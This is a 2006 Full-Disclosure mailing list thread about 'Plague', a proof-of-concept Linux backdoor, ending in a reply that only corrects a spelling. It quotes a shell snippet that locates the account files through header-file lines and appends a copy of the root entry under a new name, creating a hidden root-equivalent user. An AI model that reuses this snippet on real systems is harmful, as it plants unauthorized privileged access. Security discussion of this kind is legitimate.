-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
On Sun, 22 Oct 2006 06:29:35 -0500 [EMAIL PROTECTED] wrote: >even if they have ssh access, there is still nothing they can do, >except >to create two files in there $HOME directories containing >expressions from >paths.h and sysexits.h ? > >Why would that be considered a backdoor? > >Regards, >-Nikolay Kichukov > > >> On 10/22/06, J. Oquendo <[EMAIL PROTECTED]> wrote: >>> >>> Plague is an odd proof of concept backdoor keeping >>> tool based on the premise of using existing system >>> files and commands to keep and maintain a backdoor >>> on Linux systems. I could have modified this for >>> BSD, Solaris, etc., but I didn't feel like doing >>> the work... >>> >>> http://www.infiltrated.net/plague >>> >> >> (from the link) >> >> if [ -e /usr/include/paths.h ] >> >> then >> >> file=`awk 'NR==59 {gsub(/"/,"");print $3}' >/usr/include/paths.h` >> sed -n '1p' $file|sed 's/root/plaguePoC/g' >> $file >> file2=`awk 'NR==74 {print $8}' /usr/include/sysexits.h` >> sed -n '1p' $file2|sed 's/root/plaguePoC/g' >> $file2 >> >> fi >> >> -------------------------------- >> >> So this backdoor wouldnt work remotely, correct? You would need >to add >> the user to the people allowed to ssh in, and poke a hole for >ssh in >> the firewall./? >> >> -JP >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ You said "there" when it should be "their." -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.5 wpwEAQECAAYFAkU774sACgkQsGS6s78KOsX/dwP/YYZ+8XEB8KftGfWAxk2K0HT5HC4h 32eKy54hDbpjklVxZnjaAKrm6kNLkKfNMITDfOb+2+QLbWRAV6oPytZxuZQj0zg8Ky2w Xzk0hx0hZN5PsuGxESKLBTOLIkg9tsVDMDkPlc4eqyzewqbJgIXbcXw2UyV03welX7Ty HI1y+dw= =lSSF -----END PGP SIGNATURE----- Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
